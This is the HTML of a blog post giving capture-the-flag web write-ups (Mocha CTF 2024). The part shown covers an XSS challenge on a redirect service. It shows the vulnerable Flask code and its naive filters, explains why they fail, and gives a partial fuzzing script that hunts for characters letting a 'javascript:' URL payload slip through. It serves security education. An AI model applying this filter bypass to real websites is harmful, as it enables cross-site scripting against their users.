<!DOCTYPE html>
<html lang="en" itemscope itemtype="http://schema.org/WebPage">
  <head>
    

  <meta charset="utf-8" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0">

 


      <title>Mocha CTF 2024 Web Writeups - Alfin&#39;s Notes</title>

  <meta name="description" content="tl;dr

Basic Javascript pseudo protocol waf bypass .
Dom clobbering in a LateX library .
Csp bypass using JSONP endpoint in googleapis.com using callback.
">
  <meta name="author" content="Alfin Joseph"/><script type="application/ld+json">
{
    "@context": "http://schema.org",
    "@type": "WebSite",
    "name": "Alfins Notes",
    
    "url": "https:\/\/Alfinj0se.github.io\/"
}
</script><script type="application/ld+json">
{
  "@context": "http://schema.org",
  "@type": "Organization",
  "name": "",
  "url": "https:\/\/Alfinj0se.github.io\/"
  
  
  
  
}
</script>
<script type="application/ld+json">
{
  "@context": "http://schema.org",
  "@type": "BreadcrumbList",
  "itemListElement": [{
        "@type": "ListItem",
        "position": 1,
        "item": {
          "@id": "https:\/\/Alfinj0se.github.io\/",
          "name": "home"
        }
    },{
        "@type": "ListItem",
        "position": 3,
        "item": {
          "@id": "https:\/\/Alfinj0se.github.io\/posts\/mochactf-2024\/",
          "name": "Mocha ctf 2024 web writeups"
        }
    }]
}
</script><script type="application/ld+json">
{
  "@context": "http://schema.org",
  "@type": "Article",
  "author": {
    "name" : "Alfin Joseph"
  },
  "headline": "Mocha CTF 2024 Web Writeups",
  "description" : "tl;dr\nBasic Javascript pseudo protocol waf bypass . Dom clobbering in a LateX library . Csp bypass using JSONP endpoint in googleapis.com using callback. ",
  "inLanguage" : "en",
  "wordCount":  588 ,
  "datePublished" : "2024-06-06T21:00:26\u002b05:30",
  "dateModified" : "2024-06-06T21:00:26\u002b05:30",
  "image" : "https:\/\/Alfinj0se.github.io\/img\/pfp.jpg",
  "keywords" : [ "writeups" ],
  "mainEntityOfPage" : "https:\/\/Alfinj0se.github.io\/posts\/mochactf-2024\/",
  "publisher" : {
    "@type": "Organization",
    "name" : "https:\/\/Alfinj0se.github.io\/",
    "logo" : {
        "@type" : "ImageObject",
        "url" : "https:\/\/Alfinj0se.github.io\/img\/pfp.jpg",
        "height" :  60 ,
        "width" :  60
    }
  }
}
</script>


<meta property="og:title" content="Mocha CTF 2024 Web Writeups" />
<meta property="og:description" content="tl;dr

Basic Javascript pseudo protocol waf bypass .
Dom clobbering in a LateX library .
Csp bypass using JSONP endpoint in googleapis.com using callback.
">
<meta property="og:image" content="https://Alfinj0se.github.io/img/pfp.jpg" />
<meta property="og:url" content="https://Alfinj0se.github.io/posts/mochactf-2024/" />
<meta property="og:type" content="website" />
<meta property="og:site_name" content="Alfins Notes" />

  <meta name="twitter:title" content="Mocha CTF 2024 Web Writeups" />
  <meta name="twitter:description" content="tl;dr

Basic Javascript pseudo protocol waf bypass .
Dom clobbering in a LateX library .
Csp bypass using JSONP endpoint in googleapis.com using callback.
">
  <meta name="twitter:image" content="https://Alfinj0se.github.io/img/pfp.jpg" />
  <meta name="twitter:card" content="summary_large_image" />
  <meta name="twitter:site" content="@Alfinjoseph19" />
  <meta name="twitter:creator" content="@Alfinjoseph19" />
  <link href='https://Alfinj0se.github.io/img/favicon.ico' rel='icon' type='image/x-icon'/>
  <meta name="generator" content="Hugo 0.126.1">
  <link rel="alternate" href="https://Alfinj0se.github.io/index.xml" type="application/rss+xml" title="Alfins Notes"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.16.7/dist/katex.min.css" integrity="sha384-3UiQGuEI4TTMaFmGIZumfRPtfKQ3trwQE2JgosJxCnGmQpL/lJdjpcHkaaFwHlcI" crossorigin="anonymous">
  <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.5.0/css/all.css" integrity="sha384-B4dIYHKNBt8Bc12p+WXckhzcICo0wtJAoU8YZTY5qE0Id1GSseTk6S+L3BlXeVIU" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@3.4.1/dist/css/bootstrap.min.css" integrity="sha384-HSMxcRTRxnN+Bdg0JdbxYKrThecOKuH5zCYotlSAcp1+c8xmyTe9GYg1l9a69psu" crossorigin="anonymous"><link rel="stylesheet" href="https://Alfinj0se.github.io/css/main.css" /><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic" />
  <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800" /><link rel="stylesheet" href="https://Alfinj0se.github.io/css/syntax.css" /><link rel="stylesheet" href="https://Alfinj0se.github.io/css/codeblock.css" /><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/photoswipe/4.1.2/photoswipe.min.css" integrity="sha384-h/L2W9KefUClHWaty3SLE5F/qvc4djlyR4qY3NUV5HGQBBW7stbcfff1+I/vmsHh" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/photoswipe/4.1.2/default-skin/default-skin.min.css" integrity="sha384-iD0dNku6PYSIQLyfTOpB06F2KCZJAKLOThS5HRe8b3ibhdEQ6eKsFf/EeFxdOt5R" crossorigin="anonymous">

  


  </head>
  <body>
    <nav class="navbar navbar-default navbar-fixed-top navbar-custom">
  <div class="container-fluid">
    <div class="navbar-header">
      <button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#main-navbar">
        <span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
      <a class="navbar-brand" href="https://Alfinj0se.github.io/">Alfins Notes</a>
    </div>

    <div class="collapse navbar-collapse" id="main-navbar">
      <ul class="nav navbar-nav navbar-right">
        
          
            <li>
              <a title="Blog" href="/">Blog</a>
            </li>
          
        
          
            <li>
              <a title="About" href="/page/about/">About</a>
            </li>
          
        

        

        
      </ul>
    </div>

    
      <div class="avatar-container">
        <div class="avatar-img-border">
          <a title="Alfins Notes" href="https://Alfinj0se.github.io/">
            <img class="avatar-img" src="https://Alfinj0se.github.io/img/pfp.jpg" alt="Alfins Notes" />
          </a>
        </div>
      </div>
    

  </div>
</nav>




    


<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

<div class="pswp__bg"></div>

<div class="pswp__scroll-wrap">
    
    <div class="pswp__container">
      <div class="pswp__item"></div>
      <div class="pswp__item"></div>
      <div class="pswp__item"></div>
    </div>
    
    <div class="pswp__ui pswp__ui--hidden">
    <div class="pswp__top-bar">
      
      <div class="pswp__counter"></div>
      <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>
      <button class="pswp__button pswp__button--share" title="Share"></button>
      <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>
      <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>
      
      
      <div class="pswp__preloader">
        <div class="pswp__preloader__icn">
          <div class="pswp__preloader__cut">
            <div class="pswp__preloader__donut"></div>
          </div>
        </div>
      </div>
    </div>
    <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
      <div class="pswp__share-tooltip"></div>
    </div>
    <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
    </button>
    <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
    </button>
    <div class="pswp__caption">
      <div class="pswp__caption__center"></div>
    </div>
    </div>
    </div>
</div>


  
  
  






  

  <header class="header-section ">
    
    
    <div class="intro-header no-img">
      <div class="container">
        <div class="row">
          <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
            <div class="posts-heading">
              
                <h1>Mocha CTF 2024 Web Writeups</h1>
              
              
                <hr class="small">
              
              
              
            </div>
          </div>
        </div>
      </div>
    </div>
  
  </header>


    
<div class="container" role="main">
  <div class="row">
    <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
      <article role="main" class="blog-post">
        <p><strong>tl;dr</strong></p>
<ul>
<li>Basic Javascript pseudo protocol waf bypass .</li>
<li>Dom clobbering in a LateX library .</li>
<li>Csp bypass using JSONP endpoint in googleapis.com using callback.</li>
</ul>
<h2 id="-raas---initial-analysis">🔎 Raas - Initial Analysis</h2>
<p>The application is basically Redirection as a service. The main functionality is in the <code>/redirectTo</code> endpoint .</p>
<div class="highlight"><div style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">
<table style="border-spacing:0;padding:0;margin:0;border:0;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 1
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 2
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 3
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 4
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 5
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 6
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 7
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 8
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 9
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">10
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">11
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">12
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">13
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">14
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#ff9f43">@app.route</span>(<span style="color:#5af78e">&#39;/redirectTo&#39;</span>, methods<span style="color:#ff6ac1">=</span>[<span style="color:#5af78e">&#39;GET&#39;</span>])
</span></span><span style="display:flex;"><span><span style="color:#ff6ac1">def</span> <span style="color:#57c7ff">redirect_to</span>():
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    url <span style="color:#ff6ac1">=</span> request<span style="color:#ff6ac1">.</span>args<span style="color:#ff6ac1">.</span>get(<span style="color:#5af78e">&#34;url&#34;</span>)
</span></span><span style="display:flex;"><span>    title <span style="color:#ff6ac1">=</span> request<span style="color:#ff6ac1">.</span>args<span style="color:#ff6ac1">.</span>get(<span style="color:#5af78e">&#34;title&#34;</span>)
</span></span><span style="display:flex;"><span>    default_url <span style="color:#ff6ac1">=</span> <span style="color:#5af78e">&#34;https://www.youtube.com/watch?v=xvFZjo5PgG0&amp;ab_channel=Duran&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#ff6ac1">if</span> <span style="color:#ff6ac1">not</span> <span style="color:#ff5c57">isinstance</span>(title,<span style="color:#ff5c57">str</span>) <span style="color:#ff6ac1">or</span> <span style="color:#ff6ac1">not</span> <span style="color:#ff5c57">isinstance</span>(url,<span style="color:#ff5c57">str</span>):
</span></span><span style="display:flex;"><span>        <span style="color:#ff6ac1">return</span> render_template(<span style="color:#5af78e">&#39;redirect.html&#39;</span>,url<span style="color:#ff6ac1">=</span>default_url, title<span style="color:#ff6ac1">=</span><span style="color:#5af78e">&#34;title&#34;</span>)
</span></span><span style="display:flex;"><span>    url <span style="color:#ff6ac1">=</span> url<span style="color:#ff6ac1">.</span>strip()
</span></span><span style="display:flex;"><span>    <span style="color:#ff5c57">print</span>(url)
</span></span><span style="display:flex;"><span>    <span style="color:#ff6ac1">if</span> <span style="color:#ff6ac1">not</span> check_url(url) <span style="color:#ff6ac1">or</span> <span style="color:#ff6ac1">not</span> check_title(title):
</span></span><span style="display:flex;"><span>        <span style="color:#ff6ac1">return</span> render_template(<span style="color:#5af78e">&#34;redirect.html&#34;</span>, title<span style="color:#ff6ac1">=</span>title, url<span style="color:#ff6ac1">=</span>default_url)
</span></span><span style="display:flex;"><span>    <span style="color:#ff6ac1">return</span> render_template(<span style="color:#5af78e">&#39;redirect.html&#39;</span>,url<span style="color:#ff6ac1">=</span>url, title<span style="color:#ff6ac1">=</span>title)
</span></span></code></pre></td></tr></table>
</div>
</div><p>here it&rsquo;s taking a url and title as GET parameters and the url is being reflected in an anchor tags href value, and thats how the redirection was being implemented.</p>
<div class="highlight"><div style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">
<table style="border-spacing:0;padding:0;margin:0;border:0;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-html" data-lang="html"><span style="display:flex;"><span> &lt;<span style="color:#ff6ac1">a</span> <span style="color:#57c7ff">id</span><span style="color:#ff6ac1">=</span><span style="color:#5af78e">&#34;url&#34;</span> <span style="color:#57c7ff">href</span><span style="color:#ff6ac1">=</span><span style="color:#5af78e">&#34;{{url}}&#34;</span>&gt;Follow Link&lt;/<span style="color:#ff6ac1">a</span>&gt;
</span></span></code></pre></td></tr></table>
</div>
</div><p>The title is also being reflected inside an header tag like so .</p>
<div class="highlight"><div style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">
<table style="border-spacing:0;padding:0;margin:0;border:0;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-html" data-lang="html"><span style="display:flex;"><span>&lt;<span style="color:#ff6ac1">h2</span>&gt;{{title}}&lt;/<span style="color:#ff6ac1">h2</span>&gt;
</span></span></code></pre></td></tr></table>
</div>
</div><h2 id="-attack-plan">🥷 Attack plan</h2>
<p>Our aim is <strong>XSS</strong> and there are 2 paths we could take either the title or the url way .However there is a filter for both parameters.</p>
<div class="highlight"><div style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">
<table style="border-spacing:0;padding:0;margin:0;border:0;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 1
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 2
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 3
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 4
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 5
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 6
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 7
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 8
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 9
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">10
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">11
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">12
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">13
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">14
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">15
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">16
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#78787e"># check for url parameter</span>
</span></span><span style="display:flex;"><span><span style="color:#ff6ac1">def</span> <span style="color:#57c7ff">check_url</span>(url):
</span></span><span style="display:flex;"><span>    url <span style="color:#ff6ac1">=</span> url<span style="color:#ff6ac1">.</span>lower()
</span></span><span style="display:flex;"><span>    <span style="color:#ff5c57">print</span>(<span style="color:#5af78e">&#34;url: &#34;</span><span style="color:#ff6ac1">+</span>url)
</span></span><span style="display:flex;"><span>    pattern <span style="color:#ff6ac1">=</span> <span style="color:#5af78e">r</span><span style="color:#5af78e">&#39;[()=$`]&#39;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#ff6ac1">if</span> <span style="color:#ff5c57">bool</span>(re<span style="color:#ff6ac1">.</span>search(pattern, url, re<span style="color:#ff6ac1">.</span>IGNORECASE <span style="color:#ff6ac1">|</span> re<span style="color:#ff6ac1">.</span>DOTALL)):
</span></span><span style="display:flex;"><span>        <span style="color:#ff6ac1">return</span> <span style="color:#ff6ac1">False</span>
</span></span><span style="display:flex;"><span>    <span style="color:#ff6ac1">if</span> url<span style="color:#ff6ac1">.</span>startswith(<span style="color:#5af78e">&#34;j&#34;</span>) <span style="color:#ff6ac1">or</span> <span style="color:#5af78e">&#34;javascript&#34;</span> <span style="color:#ff6ac1">in</span> url:
</span></span><span style="display:flex;"><span>        <span style="color:#ff6ac1">return</span> <span style="color:#ff6ac1">False</span>
</span></span><span style="display:flex;"><span>    <span style="color:#ff6ac1">return</span> <span style="color:#ff6ac1">True</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#78787e"># check for title param</span>
</span></span><span style="display:flex;"><span><span style="color:#ff6ac1">def</span> <span style="color:#57c7ff">check_title</span>(title):
</span></span><span style="display:flex;"><span>    <span style="color:#ff6ac1">if</span> <span style="color:#5af78e">&#34;&lt;&#34;</span> <span style="color:#ff6ac1">in</span> title <span style="color:#ff6ac1">or</span> <span style="color:#5af78e">&#34;&gt;&#34;</span> <span style="color:#ff6ac1">in</span> title:
</span></span><span style="display:flex;"><span>        <span style="color:#ff6ac1">return</span> <span style="color:#ff6ac1">False</span>
</span></span><span style="display:flex;"><span>    <span style="color:#ff6ac1">return</span> <span style="color:#ff6ac1">True</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>In the <strong>check_title()</strong> it checking if there are <code>&lt;</code> or <code>&gt;</code> so we cant give tags,  so XSS using title parameter is not possible .</p>
<p>Moving onto the <strong>check_url()</strong> function we can see that its checking whether or not the url starts with a <code>j</code> or if there&rsquo;s a <code>javascript</code> anywhere in the url, this check is done to prevent XSS using the <strong>javascript pesudo-protocol</strong>.</p>
<p>However the javascript URL is more complicated its never a good idea to do the check like this.</p>
<div class="highlight"><div style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">
<table style="border-spacing:0;padding:0;margin:0;border:0;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 1
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 2
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 3
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 4
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 5
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 6
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 7
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 8
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 9
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">10
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">11
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">12
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-javascript" data-lang="javascript"><span style="display:flex;"><span><span style="color:#78787e">// A javascript: URL can contain leading C0 control or \u0020 SPACE,
</span></span></span><span style="display:flex;"><span><span style="color:#78787e">// and any newline or tab are filtered out as if they&#39;re not part of the URL.
</span></span></span><span style="display:flex;"><span><span style="color:#78787e">// https://url.spec.whatwg.org/#url-parsing
</span></span></span><span style="display:flex;"><span><span style="color:#78787e">// Tab or newline are defined as \r\n\t:
</span></span></span><span style="display:flex;"><span><span style="color:#78787e">// https://infra.spec.whatwg.org/#ascii-tab-or-newline
</span></span></span><span style="display:flex;"><span><span style="color:#78787e">// A C0 control is a code point in the range \u0000 NULL to \u001F
</span></span></span><span style="display:flex;"><span><span style="color:#78787e">// INFORMATION SEPARATOR ONE, inclusive:
</span></span></span><span style="display:flex;"><span><span style="color:#78787e">// https://infra.spec.whatwg.org/#c0-control-or-space
</span></span></span><span style="display:flex;"><span><span style="color:#78787e"></span>
</span></span><span style="display:flex;"><span><span style="color:#78787e">/* eslint-disable max-len */</span>
</span></span><span style="display:flex;"><span><span style="color:#ff6ac1">const</span> isJavaScriptProtocol <span style="color:#ff6ac1">=</span>
</span></span><span style="display:flex;"><span>  <span style="color:#5af78e">/^[\u0000-\u001F ]*j[\r\n\t]*a[\r\n\t]*v[\r\n\t]*a[\r\n\t]*s[\r\n\t]*c[\r\n\t]*r[\r\n\t]*i[\r\n\t]*p[\r\n\t]*t[\r\n\t]*\:/i</span>;
</span></span></code></pre></td></tr></table>
</div>
</div><p>This is the React libraries implementation to check for javascript URL from this its understandable the flexibility of the <code>javascript:</code>. Its possible to have newlines and tabs within the string and additional characters before the <code>javascript:</code></p>
<p>Its always good to <strong>FUZZ</strong> for characters when it comes to stuff like this</p>
<div class="highlight"><div style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">
<table style="border-spacing:0;padding:0;margin:0;border:0;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 1
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 2
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 3
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 4
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 5
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 6
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 7
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 8
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f"> 9
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">10
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">11
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">12
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">13
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">14
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">15
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-html" data-lang="html"><span style="display:flex;"><span>&lt;<span style="color:#ff6ac1">script</span>&gt;
</span></span><span style="display:flex;"><span>        
</span></span><span style="display:flex;"><span>        <span style="color:#ff5c57">let</span> logs <span style="color:#ff6ac1">=</span> []
</span></span><span style="display:flex;"><span>        <span style="color:#ff6ac1">for</span>(<span style="color:#ff5c57">let</span> i<span style="color:#ff6ac1">=</span><span style="color:#ff9f43">0</span>;i<span style="color:#ff6ac1">&lt;</span><span style="color:#ff9f43">0x10ffff</span>;i<span style="color:#ff6ac1">++</span>){
</span></span><span style="display:flex;"><span>            <span style="color:#ff5c57">let</span> anchor <span style="color:#ff6ac1">=</span> <span style="color:#ff5c57">document</span>.createElement(<span style="color:#5af78e">&#34;a&#34;</span>)
</span></span><span style="display:flex;"><span>            anchor.href <span style="color:#ff6ac1">=</span><span style="color:#5af78e">`</span><span style="color:#5af78e">${</span><span style="color:#ff5c57">String</span>.fromCodePoint(i)<span style="color:#5af78e">}</span><span style="color:#5af78e">j</span><span style="color:#5af78e">${</span><span style="color:#ff5c57">String</span>.fromCodePoint(i)<span style="color:#5af78e">}</span><span style="color:#5af78e">avascript:alert(1337)`</span>
</span></span><span style="display:flex;"><span>            <span style="color:#ff6ac1">if</span>(anchor.protocol <span style="color:#ff6ac1">==</span> <span style="color:#5af78e">&#34;javascript:&#34;</span>){
</span></span><span style="display:flex;"><span>                logs.push(<span style="color:#ff5c57">encodeURIComponent</span>(<span style="color:#ff5c57">String</span>.fromCharCode(i)))
</span></span><span style="display:flex;"><span>                anchor.append(<span style="color:#5af78e">`            </span><span style="color:#5af78e">${</span>i<span style="color:#5af78e">}</span><span style="color:#5af78e">            CLick me          `</span>)
